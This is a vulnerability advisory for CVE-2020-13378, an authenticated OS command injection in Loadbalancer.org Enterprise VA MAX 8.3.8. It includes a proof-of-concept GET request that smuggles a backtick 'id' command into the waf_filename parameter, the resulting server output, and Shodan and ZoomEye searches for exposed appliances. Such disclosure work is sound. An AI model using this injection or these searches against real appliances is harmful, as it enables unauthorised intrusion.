Headline
CVE-2020-13378: OS Command Injection in Enterprise loadbalancer VA MAX - v8.3.8 and earlier
Loadbalancer.org Enterprise VA MAX through 8.3.8 has an OS Command Injection vulnerability that allows a remote authenticated attacker to execute arbitrary code.
Vulnerability: OS Command Injection
OS Command Injection in Loadbalancer.org Appliance v8.3.8-134
Vendor: Loadbalancer.org, https://www.loadbalancer.org
Product: ENTERPRISE VA MAX
Version affected: Loadbalancer.org Appliance v8.3.8 as the latest in October 2019
Product description:
“Loadbalancer.org is a well-established international provider of reliable, versatile and cost-effective application delivery products and services. The load balancer experts help solve the issues of availability and scalability by providing an unbreakable solution to ensure zero downtime of critical IT applications.
Loadbalancer.org’s consultancy led approach means they have specialist engineers that will help design and simplify architecture guaranteeing painless deployments every single time. The team of experts are effortlessly able to set up test environments, document each deployment, provide customized solutions and assist with complex migrations. They will support a business, not just the load balancer!
Loadbalancer.org load balancers are sold as hardware, virtual or cloud formats and are more scalable, flexible and are economical compared to competitive offerings. With no performance or feature restrictions, their suite of products can load balance any application, for any company, in any industry, anywhere in the world.
Allowing customers to have direct access 24 hours a day 7 days a week to a team of passionate engineers via phone, online chat and e-mail sets Loadbalancer.org apart from other ADC vendors.
” as per statement on https://www.linkedin.com/company/loadbalancer-org website.
- CVE ID: CVE-2020-13378
- CWE ID: CWE-78
Proof of Concept
A command Injection vulnerability allows attackers to execute arbitrary OS commands via a crafted HTTP request. This is exploitable by an authenticated attacker who submits a modified GET request.
Sample GET request, issuing ‘id’ OS command returns ‘uid=48(apache)’
Identified vulnerable parameters: waf_filename
Request:
GET /lbadmin/ajax/js_dispatcher.php?option=waf_log&waf_filename=modsec_audit.log%7c%60id%60&log_option=base HTTP/1.1
Host: 10.0.0.99:9443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Authorization: Basic aW5mZ[...]TEw
Connection: close
Cookie: menu=log%2Flaw; hiderestartwarning=0
HTTP/1.1 200 OK
Date: Thu, 03 Oct 2019 11:38:17 GMT
Server: Apache
Content-Length: 800
Connection: close
Content-Type: text/html; charset=UTF-8
<div class="exception"><h2>Exception LBFileError:</h2><p><em>Please report the full text of this exception to <a href="mailto:[email protected]">Loadbalancer.org Support</a>, together with brief details of the operation you were performing.</em></p>
<p><em>Thank you.</em></p><p><pre>ensure_access(): 'chown --no-dereference root:apache /var/log/httpd/modsec_audit.log|`id`' failed: errno 127, sh: uid=48(apache): command not found</pre></p><h3>Trace:</h3>
<p><pre>#0 /var/www/html/lbadmin/inc/waf.inc(1878): ensure_access('/var/log/httpd/...')
#1 /var/www/html/lbadmin/inc/js_dispatch_func_call.inc(62): load_waf_log_file('modsec_audit.lo...', 'base')
#2 /var/www/html/lbadmin/ajax/js_dispatcher.php(70): get_waf_log(Array)
#3 {main}</pre></p></div>
Public searches:
https://www.zoomeye.org/searchResult?q=Loadbalancer%2Corg
https://www.shodan.io/search?query=loadbalancer.org
but this company has interestingly some reputable partnership alliance
References
- https://www.immuniweb.com/vulnerability/os-command-injection.html
- https://www.loadbalancer.org
- https://cwe.mitre.org/data/definitions/78.html
- https://www.checkmarx.com/knowledge/knowledgebase/OS-Command_Injection